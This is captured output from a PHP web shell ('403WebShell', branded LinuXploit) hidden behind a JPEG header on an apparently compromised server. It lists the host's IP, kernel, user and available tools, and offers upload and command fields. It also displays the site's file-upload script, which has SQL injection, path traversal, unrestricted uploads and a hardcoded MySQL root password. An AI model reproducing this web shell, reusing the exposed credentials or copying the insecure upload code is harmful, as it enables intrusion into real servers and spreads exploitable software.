????JFIF??x?x????'403WebShell
403Webshell
Server IP : 79.136.114.73  /  Your IP : 3.141.167.59
Web Server : Apache/2.4.7 (Ubuntu) PHP/5.5.9-1ubuntu4.29 OpenSSL/1.0.1f
System : Linux b8009 3.13.0-170-generic #220-Ubuntu SMP Thu May 9 12:40:49 UTC 2019 x86_64
User : www-data ( 33)
PHP Version : 5.5.9-1ubuntu4.29
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/www.notes-online.se/scripts/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ Back ]     

Current File : /var/www/www.notes-online.se/scripts/HTTPPOST_ReceiveFile.php
<?php


$companyid = $_POST['companyid'];
$userid = $_POST['userid'];
$filename = $_POST['path'];

if($userid == ""){
	$userid = $_GET['userid'];
}

if($companyid == ""){
	$companyid = $_GET['companyid'];
}

if($filename == ""){
	$filename = $_GET['filename'];
}


function AddPath($PathToCreate){
		$iBreak = 0;
		$iBreak = strrpos($PathToCreate, "/");
		if($iBreak !== FALSE){
			$Parent = substr($PathToCreate, 0, $iBreak);
			if(!@chdir($Parent)){
				AddPath($Parent);
			}
		}
	
		if(!@chdir($PathToCreate)){
			mkdir($PathToCreate);
		}
	}

$path =  "/var/www/notes_files/upload/".$companyid. "/".$filename ."/";

$link = mysql_connect ("localhost", "root", "root123");
	mysql_select_db ("notes");


$sql = "INSERT INTO tblActionLog VALUES(null,$userid,'Exporting file to server','".date("Y-m-d H:i:s")."')";
$result = mysql_query($sql);


if($companyid == ""){
	

	$sql = "SELECT * FROM tblUsers where userId = $userid";
	
	$result = mysql_query($sql);
	while ($row = mysql_fetch_assoc($result)){ 
			$companyid = $row['companyId'];
	}
}


$path =  "/var/www/notes_files/upload/".$companyid. "/".$filename ."/";


//$path  = utf8_decode($path);
$path = str_replace("?","",$path);


$name = $_FILES["file"]["name"];
//$name  = utf8_decode($name);
$name = str_replace("?","",$name);

if(!file_exists($path)){
	AddPath($path);
}



move_uploaded_file($_FILES["file"]["tmp_name"],$path. $name);



	

?>

Youez - 2016 - github.com/yon3zu
LinuXploit